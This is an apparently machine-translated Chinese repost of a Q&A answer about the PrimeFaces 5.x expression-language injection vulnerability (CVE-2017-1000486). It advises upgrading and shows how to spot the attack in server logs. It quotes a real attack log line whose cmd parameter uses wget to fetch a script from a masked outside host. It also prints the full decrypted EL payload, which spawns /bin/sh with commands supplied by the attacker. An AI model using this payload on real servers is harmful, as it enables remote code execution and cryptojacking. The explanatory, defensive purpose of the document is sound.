作者:张诣轩压_143 | 来源:互联网 | 2023-01-01 02:32
1> BalusC..:
JSF(Mojarra)中没有远程代码执行的漏洞.另请参阅其CVE摘要,其中仅列出史前1.2_08版本中的XSS错误.
只有在PrimeFaces 5.x中有背后的资源处理程序的EL喷射孔StreamedContent
,将/dynamiccontent.properties
.此EL注入漏洞允许攻击者在服务器计算机上执行代码.另请参阅其CVE摘要,其中列出了这种易碎性.您的问题历史记录确认您正在使用PrimeFaces.
根据PrimeFaces问题1152,这已经在2016年2月修复,并且自PrimeFaces 5.2.21/5.3.8/6.0起可以修复.换句话说,只需持续保持软件最新.
也就是说,通过分析服务器访问日志也可以很容易地确定这一点.下面是一个示例日志条目,其中利用了这种可挖掘性.请特别注意pfdrid
请求中的特殊长请求参数和cmd
请求参数/dynamiccontent.properties
:
GET /javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&ln=primefaces&pfdrid=4ib88tY5cy3INAZZsdtHPFU0Qzf8xqfq7ScCVr132r36qawXCNDixKdRFB0XZvCTU9npUitDjk1QTkIeQJA4yEY72QT3qDGJpZjuqCDIWniQcr2vJZR%2B005iFZzJ%2Fi7VR9Mx5l5cedTgq9wS03rem26ubch9%2Bq4W6msPwJ1hk0KMefG9yZl3o5nYeA5gvnp9LQJb3r%2BM1yQ00zFBDzT4i9Nsx%2Fs5eaGsq9BFptosdH06iT1k7rn%2BrQtPjyIbOQzOmnMx%2F6THLsOCppRaIG7BW4VRbsIi1gJ8cRh6%2Bad71ukPWbDdM6S6O0Qcr%2FdkssHfL5%2F7y8Xy%2FcyDiiljeZj3dIibq3CSy6RBaZGzRXqjYAyV%2FJ7n3ulIkSVKszrCy3VyWb1uCY0fKLrPd3EO%2Flsw3k%2FbYSofV9MA% 2BAaTnD8PXYhmiYGvp9b2R1BQGb8WgFk0fyTITJFZfUTJhM%2BiRJruw9ALDox8MY9S0SnpbmXM3LQmVYSghH0j4Zgi7Te7SZZK6gqgZEkrTA%2BQgAaZRIFG6R810xr5PZoWWG0Fdf9x491vRYtUSet8xCHIofPZ7fS5uP3mi2btGxWy8TgAEyC2wT%2F19mudycgOdTXW9nMt5nOf62fOdKSBYs2jStSwe2a6I6N5Bzp0Z7sdiJ0gmrHiYoJlkyT7p0wWGEk5Q4Xe1EPWIwGZIOr43j6BE7HUP5%2F7KdejsAQzNZZr1ox99VhH1TYwRuH7A7%2BN%2FWheWQCn%2FEM0xlpXC4GssZp4xPVah%2BP9wNH054upTkx4jH8j4houh2UfrjM9Vn18J%2BC1inTqHliDnzu9LFrm5L88eHCnLNDf6cyNmIaom7o2hEoNcffVMJ%2FhWkW7Xw VkNS2b0%2B%2B1ZgQXCd7QE0dpIujuJ79keSD1cUyGdgKCVx70vtcbAcfa07Yt3DBPzeIP%2FLQjU6%2F%2BEwTS3oy4gttmMReFb7Bmn0uOUsmGZ%2FKkJNyWwN3wlsEfNFJzLx8%2FtCWjroQVWR0xS0ZudruYXAFmmi9O5iPYjyyQCH8JUrzR4N9vyWffKq1THVtN21EvX7x87Xl908kTe79uh6J61ICVo0PABqIl87m1n7te3d3pZ72PCXetr7GcaElzna95Nfoix9pwJ6GWAjRTcGNPT67lMx7cYKXmTD0mQAzXvlgWi2yEzFt9NA0NFhhZ4m6UeRZ7%2Bgs1Rr0HMpPu%2FNIvaCjTyZRdqRyxrDQ%2FF2QCTxpVEWKYWEEV2t6g%2BQ2m3Xo%2ByyWgeDbY8mHmwkdYUKO3QtwYxXtXTKT9dwCRtE1wDsYjLN0wMdSrg4YX3jCYlt7kV%2FymlnhNoSnVQoDJeumsGI1%2BdmKu2AJY8sGqXo2PJd10CxpQSO6D4F7RxA8fQji8shFybjhRek0YiEXxmvnhsBzCkBCXWguA7RXsMGLrerXVD1wHo5Jf7wQmLOyKUH7nne9ezwzVdQnaqadFehgZ6a6f5d%2FfxIRUZ1tKeLPST16CBlY0%2BPsRQDJJwWrRXdpuwon4PzHQXLD%2BAhQ%2F8j9Mb0OTM8RdZLuRjXw7tcY4muQDwMRCb92ipMiorDO8jVwPPOAXc5waNbSGmRhzOW1%2BLsQpV8OEMKVMDXq5dRoYKz6tlH0Zh4eZTHED3hK8z4cukSTXuxFpdC5NjiVsyhQU71J87Tvkzw1HxbjqhJK%2BkoPySJCmpHOmrrsbNlp0kHtNHuhY&CMD =的wget%20http:// XXX .XXX.XXX.XXX/CONTACT/test.py%20-O%20/tmp/test.py%20 - no-check-certificate HTTP/1.1"200 1" - ""Mozilla/5.0(Windows NT 6.1; rv:52.0)Gecko/20100101 Firefox/52.0"
所述pfdrid
请求参数通常表示一个EL表达式它引用bean属性返回的加密值StreamedContent
,如#{bean.image}
.但是,由于加密易受攻击性较弱(开源8字节盐),攻击者可以轻松提供任意加密字符串并成功解密并最终进行EL评估.
当PrimeFaces 5.x StreamedContentHandler
解密上面提供的pfdrid
示例时,EL评估之前的结果字符串如下所示(为了可读性而添加了换行符):
${session.setAttribute("arr","".getClass().forName("java.util.ArrayList").newInstance())}
${session.setAttribute("scriptfactory", session.getClass().getClassLoader().getParent()
.newInstance(session.getAttribute("arr").toArray(session.getClass().getClassLoader().getParent().getURLs()))
.loadClass("javax.script.ScriptEngineManager").newInstance())}
${session.setAttribute("scriptengine",session.getAttribute("scriptfactory").getEngineByName("Javascript"))}
${facesContext.getExternalContext().setResponseHeader("resp1", session.getAttribute("scriptengine"))}
${session.getAttribute("scriptengine").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}
${session.getAttribute("scriptengine").eval("
var proc = new java.lang.ProcessBuilder[\\"(java.lang.String[])\\"]([\\"/bin/sh\\",\\"-c\\",\\"".concat(request.getParameter("cmd")).concat("\\"]).start();
var is = proc.getInputStream();
var sc = new java.util.Scanner(is,\\"UTF-8\\");
var out = \\"\\";
while (sc.hasNext()) {
out += sc.nextLine()+String.fromCharCode(10);
}
print(out);
"))}
${facesContext.getExternalContext().getResponse().getWriter().flush()}
${facesContext.getExternalContext().getResponse().getWriter().close()}
${facesContext.getExternalContext().setResponseHeader("stillok", "yes")}
在效果中,它创建Javascript引擎,然后评估一段代码,该代码基本上/bin/sh
使用cmd
请求参数中提供的命令运行该进程,在此情况下wget%20http://XXX.XXX.XXX.XXX/CONTACT/test.py%20-O%20/tmp/test.py%20--no-check-certificate
,该命令将其输出传递给响应.目标站点依次检查stillok=yes
响应头是否存在,然后继续产生其他/dynamiccontent.properties
请求,这些请求又使用其他shell命令遍历文件夹结构,获取有关它的信息,找到模板文件并最终编辑它们以注入加密货币挖掘脚本.
也可以看看:
PrimeFaces 5.x表达式语言注入
PrimeFaces中的弱加密缺陷
CVE-2017-1000486
Cryptojacking已经失控